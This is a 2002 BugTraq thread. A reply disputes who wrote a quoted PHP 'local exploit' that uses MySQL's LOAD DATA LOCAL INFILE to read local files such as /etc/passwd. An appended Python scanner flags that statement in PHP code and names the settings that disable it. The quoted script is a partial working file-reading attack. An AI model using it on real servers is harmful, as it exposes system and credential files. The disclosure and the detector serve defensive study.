BugTraq
File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 26 2002 10:57AM
Hai Nam Luke (hainamluke hotmail com)
(1 replies)
Re: File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 27 2002 09:54AM
Dave Wilson (dw botanicus net)
Hi there,
Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.
On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:
> Attacker can use PHP and mySQL to read some local file following this way:
>
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
>
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view
>
> // shell code
> echo "<pre>";
>
> mysql_connect ($dbhost, $dbuser, $dbpasswd);
> $sql = array (
> "USE $dbname",
>
> 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
>
> "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
> . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
> . "ESCAPED BY '' "
> . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
>
> "SELECT a FROM $tbl LIMIT 1"
> );
Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).
> Luke (HVA)
> http://www.hackervn.net
Dave Wilson.
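
A defensive follow-up to the thread, as an added example that is not from either poster: a Python heuristic that scans PHP source for client-side `LOAD DATA LOCAL INFILE` statements, rejoining string literals concatenated with `.` as in the quoted script. The sample source, the function names and the result tuple layout are assumptions made for illustration.

```python
import re

# Constructed sample (not from the thread): PHP shaped like the quoted script,
# with the statement split across concatenated string literals and lines.
SAMPLE_PHP = r"""<?php
$sql = array(
    "USE $dbname",
    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
    . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
    . "ESCAPED BY '' ",
    "SELECT a FROM $tbl LIMIT 1"
);
$ok = "LOAD DATA INFILE '/srv/import/rows.csv' INTO TABLE t";  // server-side, no LOCAL
"""

# A PHP string literal, single- or double-quoted, with backslash escapes.
STRING_LIT = re.compile(r'"((?:\\.|[^"\\])*)"|\'((?:\\.|[^\'\\])*)\'', re.S)
# The client-side form only: the LOCAL keyword must be present.
LOCAL_INFILE = re.compile(
    r"LOAD\s+DATA\s+(?:(?:LOW_PRIORITY|CONCURRENT)\s+)?LOCAL\s+INFILE\s+'([^']*)'", re.I)

def merged_literals(src):
    """Yield (line, text) for each run of string literals joined only by '.'."""
    text, start, prev_end = None, 0, 0
    for m in STRING_LIT.finditer(src):
        body = m.group(1) if m.group(1) is not None else m.group(2)
        if text is not None and src[prev_end:m.start()].strip() == ".":
            text += body  # same expression, continue the run
        else:
            if text is not None:
                yield src.count("\n", 0, start) + 1, text
            text, start = body, m.start()
        prev_end = m.end()
    if text is not None:
        yield src.count("\n", 0, start) + 1, text

def find_local_infile(src):
    """Return [(line, target, is_variable)] for LOAD DATA LOCAL INFILE statements."""
    hits = []
    for line, text in merged_literals(src):
        for m in LOCAL_INFILE.finditer(text):
            target = m.group(1)
            # Heuristic: a '$' in the path means the file is chosen at runtime.
            hits.append((line, target, "$" in target))
    return hits

if __name__ == "__main__":
    for line, target, is_var in find_local_infile(SAMPLE_PHP):
        kind = "runtime variable" if is_var else "fixed path"
        print(f"line {line}: LOAD DATA LOCAL INFILE reads {target!r} ({kind})")
```

Findings are audit leads rather than proof of abuse; the capability itself is switched off with MySQL's `local_infile` server variable and PHP's `mysqli.allow_local_infile` directive.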
Copyright 2010, SecurityFocus